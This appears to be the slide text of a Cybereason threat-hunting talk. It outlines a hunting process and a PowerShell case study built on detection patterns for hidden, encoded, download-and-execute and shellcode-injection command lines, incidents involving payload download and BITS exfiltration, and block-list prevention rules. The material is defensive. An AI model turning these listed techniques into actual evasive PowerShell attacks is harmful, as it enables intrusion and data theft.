Date post: | 08-Apr-2017 |
Category: |
Technology |
Upload: | cybereason |
View: | 36 times |
Download: | 2 times |
#whoami
Brad MechaHunting Team Manager at Cybereason
Former Technology Consultant / Cyber Defense at RSA Former CIRT Lead at a Global Advanced Manufacturing Organization
Why we’re here today
Quick Hunting Refresher
I’m Hunting!! Now What?
Giving Back & Process Integration
Expanded PowerShell Use Case
The process of proactivelydiscovering undesirable activity to illicit a positive outcome.
Refresher: Hunting defined.
Refresher: Why?
Prepare? Its very hard to defend what you can’t see and don’t understand.
Be proactive? Don’t wait for bad to happen? Then have to react to fix.
Fix stuff? Especially before it breaks!
Adapt or Perish. Learning is discovery, the discovery of the cause of our ignorance. However, the best way of learning is not the computation of information. Learning is discovering, uncovering what is there in us. When we discover, we are uncovering our own ability, our own eyes, in order to find our potential, to see what is going on, to discover how we can enlarge our lives, to find means at our disposal that will let us cope with a difficult situation.
--Bruce Lee
I’m Hunting! Now What? We’re Giving Back!
Incidents
Detection Improvements / New Collection Techniques
Prevention w/ Confidence
Config Management / Compliance / Audit
Improve Response / Triage
Motivation + Hypothesis
DataCollection
Tooling / Analysis Outcomes
Automation*
Prepare
Detect
RespondContain / Eradicate
Post-Mortem / Prevent
Hunting Process Incident Response Process
Escalated Incident
High Fidelity Detections
Use blind spots / Gaps as sources of Motivation and Hypothesis/
New Data Collection and Analysis TechniquesImprove Triage and Response SOPs
Hunting: A Deeper Dive
Previous Outcomes create new Motivation + Hypothesis’
Introducing new datasets to expand previous outcomes
Data stacking becomes more crucial to the journey to analysis / data science
© 2015 Cybereason Inc. All rights reserved.
Powershell
Service = commandline:powershell or .ps*
FilelessTechniques
Process Execution
Network Comms
PersistenceRegistry
Services
Hidden
Obfuscated
Shellcode / DLL
Execution
Encoded
Download Commands
Parent / Child
Profiling
Int2ExtProfiling
DNS Queries
Registry = commandline:powershell or .ps*
commandLine:hidden|1|-nop|iex|-invoke|ICM|scriptblock,
commandLine:`|1|^|+|$|*|&|.
commandLine:nop|nonl|nol|bypass|e|enc|ec
commandLine: DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS
commandLine:dllimport|virtualalloc
Parent: wscript|mshta|MSOffice|Browser|WMI*
Connections → Filter:isExternalConnection:true
URL: .ps*
DNS Query: TXT C2
DNS Query: Received vs Transmitted Ratios
Giving Back…Incident Escalation
Incident 1: Powershell WebClient –Downloading Stage 2 Payload
Incident 2: Remote .ps file execution / Invoking shellcode
Incident 3: Mismatched Services – Adversarial use of .ps
Incident 4: Data Exfil – Powershell BITSTransfer
Giving Back…PreventionBlock execution of PowerShell.exe on all systems where it’s not in use for administrative purposes
Force specific Parent/Child Process Relationships – MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe
Anchor Powershell scripts to a specific server directories, block .ps* from running directly on a system
Use endpoint firewall to prevent powershell.exe from connecting to non-approved IPs
Block “Bypass” “Hidden” ”Download String” “WebClient” ”DLLImport” “VirtualAlloc” as a command line argument for execution by an unauthorized user
See #2 for allowing valid applications